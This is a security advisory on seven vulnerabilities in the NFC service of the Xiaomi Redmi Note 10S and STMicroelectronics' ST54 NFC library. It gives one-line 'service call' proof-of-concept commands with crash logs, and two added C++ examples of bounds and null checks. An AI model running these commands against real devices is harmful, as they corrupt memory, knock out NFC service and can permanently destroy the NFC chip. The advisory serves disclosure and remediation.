Trustwave SpiderLabs Security Advisory TWSL2023-007:
Vulnerabilities in Xiaomi Redmi Note 10S and ST54-android-packages-apps-Nfc library

Published: 12/22/2023
Version: 1.0

Vendors: Xiaomi Redmi and ST Microelectronics
Product: Xiaomi Redmi Note 10S
Version affected: <= MIUI 13.0.5 Stable

Product description:
The Android-based smartphone.

*****
Credit: Maksymilian Motyl of Trustwave

*****
Finding 1: Privilege escalation

It has been established that any application can exchange all exported IPC calls with the nfc.st_ext service without the need to acquire the android.permission.WRITE_SECURE_SETTINGS privilege or even android.permission.NFC. The issue is a misconfiguration of the MIUI system on the Xiaomi Redmi Note 10S.

Evidence #1:
The following commands have been executed:

rosemary:/ $ service call nfc.st_ext 17 i32 6 i32 1 # connectGate
Result: Parcel(00000000 000000ff '........')
rosemary:/ $ service call nfc.st_ext 18 i32 6 i32 2 s16 AA # transceive
Result: Parcel(00000000 00000000 '........')
rosemary:/ $ service call nfc.st_ext 19 i32 6 i32 1 # disconnectGate

This resulted in the following output in the logcat logs:

01-31 14:50:35.533 29259 29273 I NfcService: connectGate() - host_id = 6 - gate_id = 1
01-31 14:50:35.533 581 581 D StNfcHal: HAL st21nfc: StNfc_hal_write
01-31 14:50:35.534 581 29290 D StNfcHal: (#00047) Tx 01 00 03 (hidden)
01-31 14:50:35.534 581 29291 W StNfcHal: ! i2cWrite!!, errno is 'I/O error'
01-31 14:50:35.540 581 29291 D StNfcHal: (#00048) Rx 01 00 04 (hidden)
01-31 14:50:35.541 581 29291 D StNfcHal: (#00049) Rx 60 06 03 01 01 01
01-31 14:50:48.981 29259 29273 I NfcService: transceive() - pipe_id = 6 - HCI cmd = 2
01-31 14:51:33.781 29259 29312 I NfcService: disconnectGate() - pipe_id = 6

Evidence #2:
Incorrect execution of the com.android.nfc.NfcService.programHceParameters function can disconnect other applications from the NFC, resulting in service disruption.
rosemary:/ $ service call nfc.st_ext 34
Result: Parcel(00000000 '....')

*****
Finding 2: NfcStExtensions::getProprietaryConfigSettings Out-Of-Bound Memory Read
CVE: CVE-2023-36629

The NFC library (https://github.com/STMicroelectronics/ST54-android-packages-apps-Nfc/) shared by STMicroelectronics is vulnerable to an out-of-bound memory read that allows an unprivileged process to read the runtime memory of the com.android.nfc process.

Evidence #1.
The below command has been executed as an ADB shell user. The values 4702394925722257289 and 4774451407313060418 represent the hex values 0x4142434545464789 and 0x4242424242424242.

rosemary:/ $ service call nfc.st_ext 9 i64 4702394925722257289 i64 4774451407313060418
Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe")

Results from the ADB logcat output after the command execution. The registers x19 and x20 are controlled by the attacker. The x8 register value proves the crash location shown in the next listing. The crash has occurred on the memory address 0x7c329d9f64 (x8 + 0x8a7):

10-05 19:53:01.216 21411 21411 E DEBUG : failed to read /proc/uptime: Permission denied
10-05 19:53:01.473 21411 21411 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
10-05 19:53:01.473 21411 21411 F DEBUG : Build fingerprint: 'Redmi/rosemary_eea/rosemary:12/SP1A.210812.016/V13.0.3.0.SKLEUOR:user/release-keys'
10-05 19:53:01.473 21411 21411 F DEBUG : Revision: '0'
10-05 19:53:01.473 21411 21411 F DEBUG : ABI: 'arm64'
10-05 19:53:01.473 21411 21411 F DEBUG : Timestamp: 2022-10-05 19:53:01.214973507+0200
10-05 19:53:01.473 21411 21411 F DEBUG : Process uptime: 0s
10-05 19:53:01.473 21411 21411 F DEBUG : Cmdline: com.android.nfc
10-05 19:53:01.473 21411 21411 F DEBUG : pid: 21109, tid: 21124, name: Binder:21109_2 >>> com.android.nfc <<<
10-05 19:53:01.473 21411 21411 F DEBUG : uid: 1027
10-05 19:53:01.473 21411 21411 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x7c329d9f64
10-05 19:53:01.473 21411 21411 F DEBUG : x0 0000007bf15b5690 x1 0000000000000000 x2 0000000000000000 x3 0000000000000000
10-05 19:53:01.473 21411 21411 F DEBUG : x4 0000000000000000 x5 00000000ffffffff x6 00000000ffffffff x7 0000000000018900
10-05 19:53:01.473 21411 21411 F DEBUG : x8 0000007c329d96bd x9 8d9fd1788a2fdf29 x10 0000000000000000 x11 0000000000000000
10-05 19:53:01.474 21411 21411 F DEBUG : x12 000000000003ea1c x13 000000000003ea1a x14 0000000000000028 x15 0000000000000027
10-05 19:53:01.474 21411 21411 F DEBUG : x16 0000007c90f4ec40 x17 0000007c90f3e930 x18 0000007b83940000 x19 0000000042424242
10-05 19:53:01.474 21411 21411 F DEBUG : x20 0000000041424345 x21 0000007bf15b5378 x22 0000007bf15b5690 x23 0000000000000000
10-05 19:53:01.474 21411 21411 F DEBUG : x24 0000007bf15b6f70 x25 0000007bf19f4000 x26 0000007bf19f3078 x27 0000007bf19f3058
10-05 19:53:01.474 21411 21411 F DEBUG : x28 0000007bf19f30a0 x29 0000007bf19f2d90
10-05 19:53:01.474 21411 21411 F DEBUG : lr 0000007bf156f8a0 sp 0000007bf19f2c40 pc 0000007bf156f8ac pst 0000000060001000
10-05 19:53:01.474 21411 21411 F DEBUG : backtrace

*****
Finding 3: NfcStExtensions::setProprietaryConfigSettings Out-Of-Bound Write and Hardware Damage

Executing setProprietaryConfigSettings via the service call can allow writing a bit into a chosen memory address. Incorrect execution of the function will irreversibly destroy the smartphone's NFC chip.

Evidence #1.
Source code snippet of the function NfcStExtensions::setProprietaryConfigSettings. The byteNb argument is used as an index without sanitization.
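Before the vulnerable snippet, an added example of the range check that both Finding 2 (the unchecked read in getProprietaryConfigSettings) and Finding 3 (the unchecked write in setProprietaryConfigSettings) call for. This is not code from the advisory or from the ST54 library: the member names mirror the snippet below, while the buffer sizes (32 configuration bytes behind a 6-byte header, matching the byteNb + 6 offset in the snippet), the loadConfigByte and stagedByte helpers and the return-value convention are assumptions made for illustration.

```cpp
// Added example, not ST54 library code: bounds-checked counterparts to
// NfcStExtensions::getProprietaryConfigSettings / setProprietaryConfigSettings.
// Buffer sizes, header offset and helper names are assumptions.
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <optional>

namespace hardened {

// Assumed frame layout: 6 header bytes precede the configuration payload,
// which is why the advisory's snippet writes to setPropConfig[byteNb + 6].
constexpr std::size_t kHeaderLen = 6;
constexpr std::size_t kConfigLen = 32;  // assumed payload size

struct PropConfig {
    std::array<std::uint8_t, kConfigLen> config{};
};

class StExtensions {
public:
    // Reads one configuration bit. An out-of-range byteNb or bitNb yields
    // std::nullopt instead of an out-of-bound read of mPropConfig.config.
    std::optional<bool> getProprietaryConfigSettings(int byteNb, int bitNb) const {
        if (!indexOk(byteNb, bitNb)) return std::nullopt;
        const std::uint8_t cur = mPropConfig.config[static_cast<std::size_t>(byteNb)];
        return ((cur >> bitNb) & 0x1u) != 0;
    }

    // Stages one bit change in the frame destined for the NFC controller.
    // Returns false, leaving both buffers untouched, when either index would
    // fall outside the buffers (the check the advisory's snippet lacks).
    bool setProprietaryConfigSettings(int byteNb, int bitNb, bool status) {
        if (!indexOk(byteNb, bitNb)) return false;
        const std::size_t i = static_cast<std::size_t>(byteNb);
        const std::uint8_t mask = static_cast<std::uint8_t>(1u << bitNb);
        const std::uint8_t cur = mPropConfig.config[i];
        mSetPropConfig[i + kHeaderLen] =
            status ? static_cast<std::uint8_t>(cur | mask)
                   : static_cast<std::uint8_t>(cur & ~mask);
        return true;
    }

    // Loads a current configuration byte (stand-in for the value read back
    // from the controller); range-checked like the accessors above.
    bool loadConfigByte(int byteNb, std::uint8_t value) {
        if (!indexOk(byteNb, 0)) return false;
        mPropConfig.config[static_cast<std::size_t>(byteNb)] = value;
        return true;
    }

    // Returns the staged payload byte for byteNb, or std::nullopt if out of range.
    std::optional<std::uint8_t> stagedByte(int byteNb) const {
        if (!indexOk(byteNb, 0)) return std::nullopt;
        return mSetPropConfig[static_cast<std::size_t>(byteNb) + kHeaderLen];
    }

private:
    // Both the byte index and the bit index must lie inside the payload.
    static bool indexOk(int byteNb, int bitNb) {
        return byteNb >= 0 && static_cast<std::size_t>(byteNb) < kConfigLen &&
               bitNb >= 0 && bitNb < 8;
    }

    PropConfig mPropConfig;
    std::array<std::uint8_t, kHeaderLen + kConfigLen> mSetPropConfig{};
};

}  // namespace hardened

int main() {
    hardened::StExtensions ext;
    ext.loadConfigByte(3, 0x10);
    const bool ok = ext.setProprietaryConfigSettings(3, 2, true);
    std::printf("set(3,2,true) -> %d, staged byte 3 = 0x%02x\n", ok,
                static_cast<unsigned>(*ext.stagedByte(3)));
    // The caller-controlled index seen in x20 in Finding 2 (0x41424345) is rejected.
    std::printf("get(0x41424345,0) valid? %d\n",
                ext.getProprietaryConfigSettings(0x41424345, 0).has_value());
    return 0;
}
```

The staged byte is always derived from mPropConfig.config, as in the original, so a second call for the same byte recomputes it from the current value rather than from the previously staged one.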
void NfcStExtensions::setProprietaryConfigSettings(int prop_config_id,
                                                    int byteNb, int bitNb,
                                                    bool status) {
  static const char fn[] = "NfcStExtensions::setProprietaryConfigSettings";

  // byteNb comes straight from the Binder caller: it indexes mPropConfig.config
  // (out-of-bound read) and setPropConfig (out-of-bound write) with no range
  // check; bitNb is not range-checked either.
  LOG_IF(INFO, nfc_debug_enabled) << StringPrintf(
      "%s; Current value: 0x%x", fn, mPropConfig.config[byteNb]);

  if (status == true) {
    setPropConfig[byteNb + 6] = mPropConfig.config[byteNb] | ((0x1 << bitNb));
    LOG_IF(INFO, nfc_debug_enabled) << StringPrintf(
        "%s; Requested Value: 0x%x", fn, setPropConfig[byteNb + 6]);
  } else {
    setPropConfig[byteNb + 6] = mPropConfig.config[byteNb] & ~(0x1 << bitNb);
    LOG_IF(INFO, nfc_debug_enabled) << StringPrintf(
        "%s; Requested Value: 0x%x", fn, setPropConfig[byteNb + 6]);
  }
  // (remainder of the function not reproduced in the advisory)
}

*****
Finding 4: nativeNfcStExtensions_getRfConfiguration Type-Confusion

The function nativeNfcStExtensions_getRfConfiguration takes as an argument a value of the type jbyteArray; however, it is possible to provide other types of data as this argument.

Evidence #1.
The below command has been executed as an ADB shell user:

rosemary:/ $ service call nfc.st_ext 7 i64 -2000000000

The service crash has been intercepted:

02-27 18:34:17.201 11495 11495 F DEBUG : signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
02-27 18:34:17.201 11495 11495 F DEBUG : Abort message: 'JNI DETECTED ERROR IN APPLICATION: java_array == null
02-27 18:34:17.201 11495 11495 F DEBUG :     in call to SetPrimitiveArrayRegion
02-27 18:34:17.201 11495 11495 F DEBUG :     from int com.android.nfc.dhimpl.NativeNfcStExtensions.getRfConfiguration(byte[])'
02-27 18:34:17.201 11495 11495 F DEBUG : x0 0000000000000000 x1 0000000000002c82 x2 0000000000000006 x3 0000006f6d7ef9b0
02-27 18:34:17.201 11495 11495 F DEBUG : x4 0000007023f33000 x5 0000007023f33000 x6 0000007023f33000 x7 0000000000045ee4
02-27 18:34:17.201 11495 11495 F DEBUG : x8 00000000000000f0 x9 0000007013640018 x10 ffffff00fffffbdf x11 0000000000000001
02-27 18:34:17.201 11495 11495 F DEBUG : x12 0000000000000000 x13 000000000112cd30 x14 0000006f6d7ee7c0 x15
00001d45b09d9157
02-27 18:34:17.201 11495 11495 F DEBUG : x16 0000007013715d20 x17 00000070136efe20 x18 0000006f0ae8a000 x19 00000000000000ac
02-27 18:34:17.201 11495 11495 F DEBUG : x20 0000000000002c75 x21 00000000000000b2 x22 0000000000002c82 x23 00000000ffffffff
02-27 18:34:17.201 11495 11495 F DEBUG : x24 0000006f6d7efb98 x25 0000006f6d7f1000 x26 0000006f6d7f1000 x27 0000006f6d7f0080
02-27 18:34:17.201 11495 11495 F DEBUG : x28 0000006f6d7f00a0 x29 0000006f6d7efa30
02-27 18:34:17.201 11495 11495 F DEBUG : lr 00000070136a15bc sp 0000006f6d7ef990 pc 00000070136a15ec pst 0000000000001000
02-27 18:34:17.201 11495 11495 F DEBUG : backtrace:
02-27 18:34:17.201 11495 11495 F DEBUG :     #00 pc 00000000000895ec /apex/com.android.runtime/lib64/bionic/libc.so (abort+180) (BuildId: 8607e22d19978fe368fdf8f39b0835df)
02-27 18:34:17.201 11495 11495 F DEBUG :     #01 pc 00000000006d19dc /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+704) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
02-27 18:34:17.201 11495 11495 F DEBUG :     #02 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86)
02-27 18:34:17.201 11495 11495 F DEBUG :     #03 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86)
02-27 18:34:17.201 11495 11495 F DEBUG :     #04 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
02-27 18:34:17.201 11495 11495 F DEBUG :     #05 pc 000000000062f754 /apex/com.android.art/lib64/libart.so (art::JNI::SetByteArrayRegion(_JNIEnv*, _jbyteArray*, int, int, signed char const*)+768) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
02-27 18:34:17.201 11495 11495 F DEBUG :     #06 pc 000000000002376c /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_getRfConfiguration(_JNIEnv*, _jobject*, _jbyteArray*)+268) (BuildId: 8fac3d320749ecb75c84701bf4d9bb09)
02-27 18:34:17.201 11495 11495 F DEBUG :     #07 pc 000000000000a870 /data/dalvik-cache/arm64/system@system_ext@app@Nfc_st@Nfc_st.apk@classes.dex (art_jni_trampoline+128)

*****
Finding 5: nativeNfcStExtensions_transceiveEE / nativeNfcStExtensions_transceive GetArrayLength Type Confusion

The service call handlers nativeNfcStExtensions_transceiveEE and nativeNfcStExtensions_transceive lack type checks and validation of the input provided as function arguments by a user via the IPC calls.

Evidence #1.
The following command, invoking transceiveEE(int param1Int, byte[] param1ArrayOfbyte), has been executed:

rosemary:/ $ service call nfc.st_ext 15 i32 8 i32 17
Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe")

The above IPC call resulted in logging the following memory corruption:

01-31 17:42:58.138 8468 8468 D ProcessState: Binder ioctl to enable oneway spam detection failed: Invalid argument
01-31 17:42:58.142 8382 8396 I NfcService: transceiveEE() - ceeId = 8
01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594] JNI DETECTED ERROR IN APPLICATION: java_array == null
01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594]     in call to GetArrayLength
01-31 17:42:58.144 8382 8396 F com.android.nf: java_vm_ext.cc:594]     from byte[] com.android.nfc.dhimpl.NativeNfcStExtensions.transceiveEE(int, byte[])
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676] Runtime aborting...
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #00 pc 0000000000535c24 /apex/com.android.art/lib64/libart.so (art::DumpNativeStack(std::__1::basic_ostream >&, int, BacktraceMap*, char const*, art::ArtMethod*, void*, bool)+128) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #01 pc 00000000006efd94 /apex/com.android.art/lib64/libart.so (art::Thread::DumpStack(std::__1::basic_ostream >&, bool, BacktraceMap*, bool) const+236) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #02 pc 00000000006fd620 /apex/com.android.art/lib64/libart.so (art::DumpCheckpoint::Run(art::Thread*)+208) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #03 pc 0000000000362a60 /apex/com.android.art/lib64/libart.so (art::ThreadList::RunCheckpoint(art::Closure*, art::Closure*)+440) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #04 pc 00000000006fbdc0 /apex/com.android.art/lib64/libart.so (art::ThreadList::Dump(std::__1::basic_ostream >&, bool)+280) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #05 pc 00000000006d6e28 /apex/com.android.art/lib64/libart.so (art::AbortState::Dump(std::__1::basic_ostream >&) const+212) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #06 pc 00000000006d1b14 /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+1016) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #07 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #08 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #09 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #10 pc 00000000006283e4 /apex/com.android.art/lib64/libart.so (art::JNI::GetArrayLength(_JNIEnv*, _jarray*)+556) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 17:42:58.407 8382 8396 F com.android.nf: runtime.cc:676]   native: #11 pc 0000000000024d24 /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_transceiveEE(_JNIEnv*, _jobject*, int, _jbyteArray*)+396) (BuildId: a48e883d65c1a11933117a7a98a39720)

Evidence #2.
The identical bug is located inside the transceive method. The below PoC will trigger the issue in the nativeNfcStExtensions_transceive function.

rosemary:/ $ service call nfc.st_ext 18 i32 8 i32 8 i32 -1
Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe")

*****
Finding 6: nativeNfcStExtensions_getAvailableHciHostList Out-Of-Bound Write

Evidence #1.
The below command was executed, invoking a call to public native int getAvailableHciHostList(byte[] paramArrayOfbyte1, byte[] paramArrayOfbyte2):

rosemary:/ $ service call nfc.st_ext 20 i32 4294967295 s16 AAAA
Result: Parcel(Error: 0xffffffffffffffe0 "Broken pipe")

The call resulted in the following crash intercepted by logcat:

01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594] JNI DETECTED ERROR IN APPLICATION: java_array == null
01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594]     in call to SetPrimitiveArrayRegion
01-31 18:58:20.311 14428 14456 F com.android.nf: java_vm_ext.cc:594]     from int com.android.nfc.dhimpl.NativeNfcStExtensions.getAvailableHciHostList(byte[], byte[])
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676] Runtime aborting...
>&, int, BacktraceMap*, char const*, art::ArtMethod*, void*, bool)+128) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #01 pc 00000000006efd94 /apex/com.android.art/lib64/libart.so (art::Thread::DumpStack(std::__1::basic_ostream >&, bool, BacktraceMap*, bool) const+236) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #02 pc 00000000006fd620 /apex/com.android.art/lib64/libart.so (art::DumpCheckpoint::Run(art::Thread*)+208) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #03 pc 0000000000362a60 /apex/com.android.art/lib64/libart.so (art::ThreadList::RunCheckpoint(art::Closure*, art::Closure*)+440) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #04 pc 00000000006fbdc0 /apex/com.android.art/lib64/libart.so (art::ThreadList::Dump(std::__1::basic_ostream >&, bool)+280) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #05 pc 00000000006d6e28 /apex/com.android.art/lib64/libart.so (art::AbortState::Dump(std::__1::basic_ostream >&) const+212) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #06 pc 00000000006d1b14 /apex/com.android.art/lib64/libart.so (art::Runtime::Abort(char const*)+1016) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #07 pc 0000000000016ea8 /apex/com.android.art/lib64/libbase.so (android::base::SetAborter(std::__1::function&&)::$_3::__invoke(char const*)+80) (BuildId: 420d56eac27a210c92900f3ddb760c86)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #08 pc 0000000000016450 /apex/com.android.art/lib64/libbase.so (android::base::LogMessage::~LogMessage()+352) (BuildId: 420d56eac27a210c92900f3ddb760c86)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #09 pc 0000000000442e24 /apex/com.android.art/lib64/libart.so (art::JavaVMExt::JniAbort(char const*, char const*)+1612) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #10 pc 000000000062f754 /apex/com.android.art/lib64/libart.so (art::JNI::SetByteArrayRegion(_JNIEnv*, _jbyteArray*, int, int, signed char const*)+768) (BuildId: 28c5aa8a2e8fc5df069f717d6e94f7fe)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #11 pc 00000000000259dc /system/system_ext/lib64/libstnfc_nci_jni.so (android::nativeNfcStExtensions_getAvailableHciHostList(_JNIEnv*, _jobject*, _jbyteArray*, _jbyteArray*)+468) (BuildId: a48e883d65c1a11933117a7a98a39720)
01-31 18:58:20.560 14428 14456 F com.android.nf: runtime.cc:676]   native: #12 pc 000000000000a510 /data/dalvik-

*****
Finding 7: Null Pointer at NfcStExtensions::setRfConfiguration

Evidence #1.
The below service call results in the null pointer exception.
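Before the listing for Finding 7, one added example that serves Findings 4, 5, 6 and 7 together; it is not code from the advisory or from the ST54 library. In each of those findings a Java byte[] argument reaches native code without validation: in Findings 4 to 6 the JNI runtime aborts the com.android.nfc process with java_array == null inside SetByteArrayRegion or GetArrayLength, and in Finding 7 the native setRfConfiguration dereferences a null pointer (that this, too, stems from a missing array argument is an assumption of the example; the advisory records only the crash). Since jni.h is not available to compile against here, the block defines a minimal stand-in for the three JNIEnv calls involved that records the abort instead of killing the process. The handler names, the 16-byte RF configuration size, the 255-byte HCI payload limit, the echo that replaces the real HCI exchange and the negative status codes are likewise assumptions.

```cpp
// Added example, not ST54 library code: null and length checks on a Java
// byte[] argument before it is handed to JNI calls or native code.  The
// JNIEnv below is a stand-in for the real one (an assumption of this
// example); sizes, names and status codes are assumed.
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

namespace jnistub {

using jbyte = std::int8_t;
using jint = std::int32_t;
using jsize = std::int32_t;
using jbyteArray = std::vector<jbyte>*;  // null == no array was passed

struct JNIEnv {
    bool aborted = false;  // real CheckJNI aborts the process at this point

    jsize GetArrayLength(jbyteArray a) {
        if (a == nullptr) { aborted = true; return 0; }  // "java_array == null"
        return static_cast<jsize>(a->size());
    }
    void SetByteArrayRegion(jbyteArray a, jsize start, jsize len, const jbyte* src) {
        if (a == nullptr || start < 0 || len < 0 ||
            start + len > static_cast<jsize>(a->size())) { aborted = true; return; }
        std::memcpy(a->data() + start, src, static_cast<std::size_t>(len));
    }
    void GetByteArrayRegion(jbyteArray a, jsize start, jsize len, jbyte* dst) {
        if (a == nullptr || start < 0 || len < 0 ||
            start + len > static_cast<jsize>(a->size())) { aborted = true; return; }
        std::memcpy(dst, a->data() + start, static_cast<std::size_t>(len));
    }
};

constexpr jsize kRfConfigLen = 16;     // assumed size of the RF configuration blob
constexpr jsize kMaxHciPayload = 255;  // assumed upper bound for one HCI transceive

// Status codes returned to the Java caller instead of aborting (assumed convention).
enum : jint { kOk = 0, kErrNullArray = -1, kErrBadLength = -2 };

// Shared guard: reject a missing array or one shorter than required before
// any JNI call touches it.
bool arrayAtLeast(JNIEnv* env, jbyteArray a, jsize minLen) {
    if (a == nullptr) return false;
    return env->GetArrayLength(a) >= minLen;
}

// Unchecked shape, as in Finding 4: a null array goes straight to SetByteArrayRegion.
jint getRfConfigurationUnchecked(JNIEnv* env, jbyteArray out) {
    jbyte cfg[kRfConfigLen] = {};
    env->SetByteArrayRegion(out, 0, kRfConfigLen, cfg);
    return kRfConfigLen;
}

// Hardened shape for the output-array handlers (Findings 4 and 6).
jint getRfConfigurationChecked(JNIEnv* env, jbyteArray out) {
    if (out == nullptr) return kErrNullArray;
    if (!arrayAtLeast(env, out, kRfConfigLen)) return kErrBadLength;
    jbyte cfg[kRfConfigLen];
    for (jsize i = 0; i < kRfConfigLen; ++i) cfg[i] = static_cast<jbyte>(i);  // constructed sample
    env->SetByteArrayRegion(out, 0, kRfConfigLen, cfg);
    return kRfConfigLen;
}

// Hardened shape for the input-array handlers (Findings 5 and 7): validate
// before GetArrayLength / GetByteArrayRegion.  The HCI exchange itself is
// replaced by an echo into `reply`, since there is no controller here.
jint transceiveEEChecked(JNIEnv* env, jint ceeId, jbyteArray data, std::vector<jbyte>* reply) {
    (void)ceeId;  // the valid ceeId range is not known to this example
    if (data == nullptr) return kErrNullArray;
    const jsize len = env->GetArrayLength(data);
    if (len <= 0 || len > kMaxHciPayload) return kErrBadLength;
    reply->assign(static_cast<std::size_t>(len), 0);
    env->GetByteArrayRegion(data, 0, len, reply->data());
    return len;
}

}  // namespace jnistub

int main() {
    using namespace jnistub;
    JNIEnv env;
    std::printf("unchecked, null array -> rc %d, aborted=%d\n",
                getRfConfigurationUnchecked(&env, nullptr), env.aborted);
    JNIEnv env2;
    std::vector<jbyte> out(kRfConfigLen);
    std::printf("checked, null array -> rc %d; 16-byte array -> rc %d, aborted=%d\n",
                getRfConfigurationChecked(&env2, nullptr),
                getRfConfigurationChecked(&env2, &out), env2.aborted);
    return 0;
}
```

The point of the contrast is where the failure surfaces: with the unchecked handler the stand-in records an abort (on the device, the whole NFC service dies, which is the denial of service seen in the logcat output above), while the checked handlers turn the same bad input into an error status the Java layer can report.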
rosemary:/ $ service call nfc.st_ext 6 i64 -8
Result: Parcel(Error:0xffffffffffffffe0 "Broken pipe")

The logcat output:

10-05 17:19:36.395 2944 2997 I NfcService: setRfConfiguration() - modeBitmap-8
10-05 17:19:36.396 2944 2970 E libnfc_nci: [ERROR:nfa_ce_act.cc(1500)] nfa_ce_api_dereg_listen - cannot find listen_info for Felica/T4tAID
10-05 17:19:36.397 2944 2997 F libc : Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0 in tid 2997 (Binder:2944_6), pid 2944 (com.android.nfc)
10-05 17:19:36.495 24534 24534 I crash_dump64: obtaining output fd from tombstoned, type: kDebuggerdTombstoneProto
10-05 17:19:36.502 644 644 I tombstoned: received crash request for pid 2997
10-05 17:19:36.504 24534 24534 I crash_dump64: performing dump of process 2944 (target tid = 2997)
10-05 17:19:36.532 24534 24534 E DEBUG : failed to read /proc/uptime: Permission denied
10-05 17:19:36.935 24534 24534 F DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
10-05 17:19:36.935 24534 24534 F DEBUG : Build fingerprint: 'Redmi/rosemary_eea/rosemary:12/SP1A.210812.016/V13.0.3.0.SKLEUOR:user/release-keys'
10-05 17:19:36.935 24534 24534 F DEBUG : Revision: '0'
10-05 17:19:36.935 24534 24534 F DEBUG : ABI: 'arm64'
10-05 17:19:36.935 24534 24534 F DEBUG : Timestamp: 2022-10-05 17:19:36.527790824+0200
10-05 17:19:36.935 24534 24534 F DEBUG : Process uptime: 0s
10-05 17:19:36.935 24534 24534 F DEBUG : Cmdline: com.android.nfc
10-05 17:19:36.935 24534 24534 F DEBUG : pid: 2944, tid: 2997, name: Binder:2944_6 >>> com.android.nfc <<<
10-05 17:19:36.935 24534 24534 F DEBUG : uid: 1027
10-05 17:19:36.935 24534 24534 F DEBUG : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
10-05 17:19:36.935 24534 24534 F DEBUG : Cause: null pointer dereference
10-05 17:19:36.935 24534 24534 F DEBUG : x0 0000000000000000 x1 0000000000000000 x2 0000000000000000 x3 0000000000000000
10-05 17:19:36.935 24534 24534 F DEBUG : x4 0000000000000000 x5 00000000ffffffff x6 00000000ffffffff x7 0000000000000000
10-05 17:19:36.935 24534 24534 F DEBUG : x8 e6dbae821ded0471 x9 0000000000000000 x10 0000000000004001 x11 0000000000000000
10-05 17:19:36.935 24534 24534 F DEBUG : x12 000000000003ea1c x13 000000000003ea1a x14 0000000000000028 x15 0000000000000027
